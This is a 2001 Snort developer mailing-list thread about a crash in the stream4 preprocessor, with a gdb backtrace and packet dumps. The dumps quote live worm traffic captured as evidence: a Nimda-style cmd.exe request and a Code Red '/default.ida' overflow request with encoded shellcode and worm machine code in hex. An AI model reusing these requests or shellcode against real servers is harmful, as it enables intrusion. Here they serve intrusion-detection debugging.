[Snort-devel] Re: Version 1.8.3 (Build 87)

Martin Roesch roesch at ...402...
Tue Nov 20 12:54:13 EST 2001


Hi Phil,
     Keep going on it, I've seen that problem before but I haven't
really tracked it too heavily yet.  If you've got a packet file, I
wouldn't mind having a look at it too...

     -Marty

Phil Wood wrote:
> 
> Marty,
> 
> I've got a "-b" file which, when passed through snort like so:
> 
>   run -r last.CR-causescore  -N -q -A fast -o -c /tmp/CR.conf -F /tmp/bpf
> 
> gets a:
> 
>   Program received signal SIGSEGV, Segmentation fault.
> 0x807cdc9 in StoreStreamPkt (ssn=0x8c7fba8, p=0xbffff1a0, pkt_seq=3314385064)
>     at spp_stream4.c:2602
> 2602        returned = (StreamPacketData *) ubi_sptFind(s->dataPtr, (ubi_btItemPtr)spd);
> 
> I'm in the throes of zeroing in on the problem.  Have you already seen this?
> Or, should I keep throe'n?
> 
> Later,
> 
> Phil
> 
> PS: I gave snort a bpf filter of "ip", cause snort is also formatting
> packets with nimda data, but 0 in the beginning of the packet.  Hex at bottom
> of this message.
> 
> PSS: I sent you a brief mention of this a while back, but think it went
> to an old address of yours.
> 
> ==============================  gdb  info  ===================================
> (gdb) list
> 2597            return;
> 2598        }
> 2599
> 2600
> 2601        /* check for retransmissions */
> 2602        returned = (StreamPacketData *) ubi_sptFind(s->dataPtr, (ubi_btItemPtr)spd);
> 2603
> 2604        if(returned != NULL)
> 2605        {
> 2606            if(returned->payload_size == p->dsize &&
> (gdb) print *s
> Cannot access memory at address 0x8c7fbf0
> (gdb) print *p
> $1 = {pkth = 0xbffff640, pkt = 0x8158042 "", fddihdr = 0x0, fddisaps = 0x0,
>   fddisna = 0x0, fddiiparp = 0x0, fddiother = 0x0, trh = 0x0, trhllc = 0x0,
>   trhmr = 0x0, sllh = 0x0, eh = 0x8158042, vh = 0x0, ehllc = 0x0,
>   ehllcother = 0x0, ah = 0x0, iph = 0x8158050, orig_iph = 0x0,
>   ip_options_len = 0, ip_options_data = 0x0, tcph = 0x8158064,
>   orig_tcph = 0x0, tcp_options_len = 0, tcp_options_data = 0x0, udph = 0x0,
>   orig_udph = 0x0, icmph = 0x0, orig_icmph = 0x0, ext = 0x0,
>   data = 0x8158078 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\nHost: www\r\nConnnection: close\r\n\r\nnnnection: close\r\n\r\nr HTTP/1.0\r\nHost: www\r\nConnnection: close\r\n\r\n", dsize = 80, frag_flag = 0 '\000', frag_offset = 0,
>   mf = 0 '\000', df = 1 '\001', rf = 0 '\000', sp = 2292, dp = 80,
>   orig_sp = 0, orig_dp = 0, caplen = 0, URI = {uri = 0x0, length = 0},
>   ssnptr = 0x8c7fba8, ip_options = {{code = 0 '\000', len = 0,
>       data = 0x0} <repeats 40 times>}, ip_option_count = 0,
>   ip_lastopt_bad = 0 '\000', tcp_options = {{code = 0 '\000', len = 0,
>       data = 0x0} <repeats 40 times>}, tcp_option_count = 0,
>   tcp_lastopt_bad = 0 '\000', csum_flags = 0 '\000', packet_flags = 4}
> (gdb) print *ssn
> $2 = {Node = {Link = {0x0, 0x0, 0x0}, gender = 0 '\000', balance = 0 '\000'},
>   server = {ip = 135632744, port = 38814, state = 21 '\025', isn = 1006263450,
>     current_seq = 268748, base_seq = 134, last_ack = 134, win_size = 32936,
>     pkts_sent = 8781904, bytes_sent = 10331, data = {root = 0x0, cmp = 0,
>       count = 17, flags = -24 'è'}, dataPtr = 0x401b2d10}, client = {
>     ip = 791686704, port = 17, state = 0 '\000', isn = 134583936,
>     current_seq = 138430712, base_seq = 0, last_ack = 17, win_size = 38692,
>     pkts_sent = 138437616, bytes_sent = 0, data = {root = 0x19, cmp = 0xa580,
>       count = 65535, flags = 0 '\000'}, dataPtr = 0x8406120}, start_time = 0,
>   last_session_time = 521, session_flags = 138431272}
> (gdb)
> 
> ===============================  headers sorely lacking ======================
> tcpdump -n -r last.CR-causescore -x -s 1514 -c 1 not ip | hextotex
> 1 packets received by filter
> 00:02:03.211737 0:0:0:0:0:0 > 0:0:0:0:0:0 sap 00 I (s=0,r=0,C) len=1500
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000a77  00508480 :                w P   :
>   5b33ec41  caf15018  77c40000  00000000  00000000 : {3 A  P w            :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00004745  54202f64 :               GET /d :
>   65666175  6c742e69  64613f4e  4e4e4e4e  4e4e4e4e : efault.ida?NNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e00  00000000 : NNNNNNNNNNNNNNN      :
>   00000000  00000000  0000c303  00000078  00fa2025 :                x   % :
>   75393039  30257536  38353825  75636264  33257537 : u9090%u6858%ucbd3%u7 :
>   38303125  75393039  30257536  38353825  75636264 : 801%u9090%u6858%ucbd :
>   33257537  38303125  75393039  30257539  30393025 : 3%u7801%u9090%u9090% :
>   75383139  30257530  30633325  75303030  33257538 : u8190%u00c3%u0003%u8 :
>   62303025  75353331  62257535  33666625  75303037 : b00%u531b%u53ff%u007 :
>   38257530  30303025  7530303d  61202048  5454502f : 8%u0000%u00=a  HTTP/ :
>   312e300d  0a436f6e  74656e74  2d747970  653a2074 : 1.0  Content-type: t :
>   6578742f  786d6c0a  484f5354  3a777777  2e776f72 : ext/xml HOST:www.wor :
>   6d2e636f  6d0a2041  63636570  743a202a  2f2a0a43 : m.com  Accept: */* C :
>   6f6e7465  6e742d6c  656e6774  683a2033  35363920 : ontent-length: 3569  :
>   0d0a0d0a  558bec81  ec180200  00535657  8dbde8fd :     U        SVW     :
>   ffffb986  000000b8  cccccccc  f3abc785  70feffff :                 p    :
>   00000000  e90a0b00  008f8568  feffff8d  bdf0feff :            h         :
>   ff64a100  00000089  47086489  3d000000  00e96f0a :  d      G d =     o  :
>   00008f85  60feffff  c785f0fe  ffffffff  ffff8b85 :     `                :
>   68feffff  83e80789  85f4feff  ffc78558  feffff00 : h              X     :
>   00e077e8  9b0a0000  83bd70fe  ffff000f  85dd0100 :   w       p          :
>   008b8d58  feffff81  c1000001  00898d58  feffff81 :    X           X     :
>   bd58feff  ff000000  78750ac7  8558feff  ff0000f0 :  X      xu   X       :
>   bf8b9558  feffff33  c0668b02  3d4d5a00  000f859a :    X   3 f  =MZ      :
>   0100008b  8d58feff  ff8b513c  8b8558fe  ffff33c9 :      X    Q<  X   3  :
>   668b0c10  81f95045  00000f85  79010000  8b9558fe : f     PE    y     X  :
>   ffff8b42  3c8b8d58  feffff8b  54017803  9558feff :    B<  X    T x  X   :
>   ff899554  feffff8b  8554feff  ff8b480c  038d58fe :    T     T    H   X  :
> =========================  end-o-stuff =======================================

--
Martin Roesch - President, Sourcefire Inc. - (410)552-6999
roesch at ...402... - http://www.sourcefire.com  
Snort: Open Source Network IDS - http://www.snort.org